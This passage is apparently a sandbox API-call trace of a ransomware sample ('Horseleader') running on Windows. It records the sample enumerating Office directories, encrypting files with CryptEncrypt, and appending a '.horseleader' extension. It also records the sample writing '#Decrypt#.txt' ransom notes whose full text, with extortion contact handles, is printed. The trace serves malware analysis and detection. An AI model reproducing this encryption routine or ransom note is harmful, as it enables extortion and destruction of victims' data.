(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.878] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.878] CloseHandle (hObject=0x1a4) returned 1 [0244.879] GetProcessHeap () returned 0x780000 [0244.879] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.879] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bc89d70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Publisher.en-us", cAlternateFileName="PUBLIS~1.EN-")) returned 1 [0244.879] lstrcmpiW (lpString1="Publisher.en-us", lpString2="Windows") returned -1 [0244.879] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us") returned 99 [0244.879] lstrcmpW (lpString1="Publisher.en-us", lpString2=".") returned 1 [0244.879] lstrcmpW (lpString1="Publisher.en-us", lpString2="..") returned 1 [0244.879] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.879] GetProcessHeap () returned 0x780000 [0244.879] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.879] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\*") returned 101 [0244.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bc89d70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.880] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.880] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\.") returned 101 [0244.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.881] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba9ab90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bc89d70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.881] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.881] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\..") returned 102 [0244.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.881] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e4630, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1ba9ab90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="PublisherMUI.XML", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0244.881] lstrcmpiW (lpString1="PublisherMUI.XML", lpString2="Windows") returned -1 [0244.881] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 116 [0244.881] StrStrIW (lpFirst="PublisherMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.881] lstrcmpW (lpString1="PublisherMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.881] lstrcmpW (lpString1="PublisherMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.881] lstrlenW (lpString=".testttjffg") returned 11 [0244.881] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.881] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.881] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.882] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.882] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 116 [0244.882] StrStrW (lpFirst="PublisherMUI.XML", lpSrch=".txt") returned 0x0 [0244.882] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1450) returned 1 [0244.882] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5aa, lpOverlapped=0x0) returned 1 [0244.884] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.885] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5aa, lpOverlapped=0x0) returned 1 [0244.885] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.885] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.885] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.885] CloseHandle (hObject=0x15c) returned 1 [0244.885] GetProcessHeap () returned 0x780000 [0244.885] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.885] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.horseleader") returned 128 [0244.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.horseleader")) returned 1 [0244.886] GetProcessHeap () returned 0x780000 [0244.886] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.886] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.887] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.887] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 109 [0244.887] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.887] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.887] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.887] lstrlenW (lpString=".testttjffg") returned 11 [0244.887] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.887] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.887] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.887] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.888] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 109 [0244.888] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.888] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1608) returned 1 [0244.889] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x648, lpOverlapped=0x0) returned 1 [0244.891] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff9b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.891] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x648, lpOverlapped=0x0) returned 1 [0244.891] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.891] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.891] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.891] CloseHandle (hObject=0x15c) returned 1 [0244.892] GetProcessHeap () returned 0x780000 [0244.892] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.892] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.horseleader") returned 121 [0244.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.horseleader")) returned 1 [0244.893] GetProcessHeap () returned 0x780000 [0244.893] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.893] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x1bc89d70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.893] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.893] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\#Decrypt#.txt") returned 113 [0244.893] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.896] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.896] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.898] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.898] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.898] CloseHandle (hObject=0x1a4) returned 1 [0244.898] GetProcessHeap () returned 0x780000 [0244.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.898] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cba0700, ftCreationTime.dwHighDateTime=0x1cb7664, ftLastAccessTime.dwLowDateTime=0xd78c2600, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8cba0700, ftLastWriteTime.dwHighDateTime=0x1cb7664, nFileSizeHigh=0x0, nFileSizeLow=0x150378, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0244.898] lstrcmpiW (lpString1="Setup.exe", lpString2="Windows") returned -1 [0244.899] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 93 [0244.899] StrStrIW (lpFirst="Setup.exe", lpSrch=".horseleader") returned 0x0 [0244.899] lstrcmpW (lpString1="Setup.exe", lpString2="#Decrypt#.txt") returned 1 [0244.899] lstrcmpW (lpString1="Setup.exe", lpString2="_uninstalling_.png") returned 1 [0244.899] lstrlenW (lpString=".testttjffg") returned 11 [0244.899] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe", lpSrch=".testttjffg") returned 0x0 [0244.899] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.899] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.899] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.914] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Setup.exe") returned 93 [0244.915] StrStrW (lpFirst="Setup.exe", lpSrch=".txt") returned 0x0 [0244.915] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1377144) returned 1 [0244.915] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.915] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.918] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.919] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.919] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa59bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.919] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.922] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.922] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0244.922] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x14b378, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.922] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, 